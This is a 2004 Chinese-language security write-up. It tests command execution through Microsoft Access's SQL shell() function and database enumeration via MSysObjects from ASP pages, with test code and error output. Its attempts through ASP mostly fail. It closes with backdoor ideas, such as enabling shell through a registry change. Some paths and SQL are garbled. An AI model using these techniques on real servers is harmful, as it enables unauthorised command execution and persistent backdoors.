本文作者:SuperHei
文章性質:原創
發布日期:2004-09-16
我們先在accessl里直接sql查詢:
SELECT shell('c:winntsystem32cmd.exe /c dir c: >c:123456.txt');
“運行”得到結果:
C:>dir 123456.txt
驅動器 C 中的卷沒有標簽��。
卷的序列號是 3CEE-A8A9
C: 的目錄
2004-01-09 22:29 1,718 123456.txt
1 個文件 1,718 字節
0 個目錄 1,224,527,872 可用字節
C:>type 123456.txt
驅動器 C 中的卷沒有標簽��。
卷的序列號是 3CEE-A8A9
c: 的目錄
2004-01-07 15:35 44 1.txt
2004-07-15 05:15 49 11.txt
2004-01-09 22:29 0 123456.txt
2004-07-31 15:50 478 333.txt
成功執行,我們看看權限,語句改為:
SELECT shell('c:winntsystem32cmd.exe /c dir c: >c:3456.txt');
運行后:
C:>net user
KAK-E8UHOQQ9M6S 的用戶帳戶
----------------------------------------------
aa Administrator
IUSR_KAK-E8UHOQQ9M6S IWAM_KAK-E8UHOQQ9M6S
命令成功完成��。
看來權限比較大(不過可能是繼承了運行access的用戶的權限,我用的是管理員權限運行的,對guest的沒有測試)
下面我們測試sp里執行,首先自己寫個asp,代碼如下:
< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "select shell('c:winntsystem32cmd.exe /c dir c: > d:sss1.txt')"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'關閉連接
conn.close
set conn=nothing
response.write "sql為:" &sql
%>
運行這個asp,返回結果如下:
Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp��,行242
Microsoft JET Database Engine 錯誤 '80040e14'
表達式中 'shell' 函數未定義��。
/test/lse/Connections/kaoo6.asp��,行7
提示” 'shell' 函數未定義”,測試失敗,我把asp代碼里的
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
改為 dsn="Provider=Microsoft.Jet.OLEDB.3.5;Data Source="&Server.MapPath("q.mdb")
運行ie返回:
Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp��,行242
ADODB.Connection 錯誤 '800a0e7a'
Provider cannot be found. It may not be properly installed.
/test/lse/Connections/kaoo8.asp��,行5
Provider沒有安裝 沒有繼續測試.
2.關于暴庫的測試
這里使用MsysObjecs : 我們新建立個查詢,語句如下:
SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate, SysObjects.Name, ysObjects.Type ROM MSysObjects;
MSysObjects.DateCreate 得到建立時間
MSysObjects.DateUpdate 更新時間
MSysObjects.Name 數據庫名稱
MSysObjects.Type 數據庫類型
我們執行上面的語句,直接得到結果:
我們放到asp里:
< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate,MSysObjects.Name,MSysObjects.Type FROM MSysObjects;"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'關閉連接
conn.close
set conn=nothing
response.write "sql為:" &sql
%>
ie返回:
Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp��,行242
Microsoft JET Database Engine 錯誤 '80040e09'
不能讀取記錄��;在 'MSysObjects' 上沒有讀取數據權限��。
/test/lse/Connections/kaoo7.asp��,行7
提示 不能讀取記錄��;在 'MSysObjects' 上沒有讀取數據權限��。 沒辦法了,這個辦法又夭折拉.
3.補充:
在iis5(Microsoft.Jet.OLEDB.4.0)我們不可以直接執行shell(據說在Jet 3.5 也就是在iis4的時代可以),在Jet.OLEDB.4.0默認的情況下不可以,但是可以設置,我們可以通過改注冊表等來實現,具體的不知道.
后門思路:
1,就是上面的改注冊表,讓Jet.OLEDB.4.0支持shell 這樣我們可以在asp里直接利用.
2.我們通過其他程序,直接對mdb文件操作,利用select shell()執行系統命令.
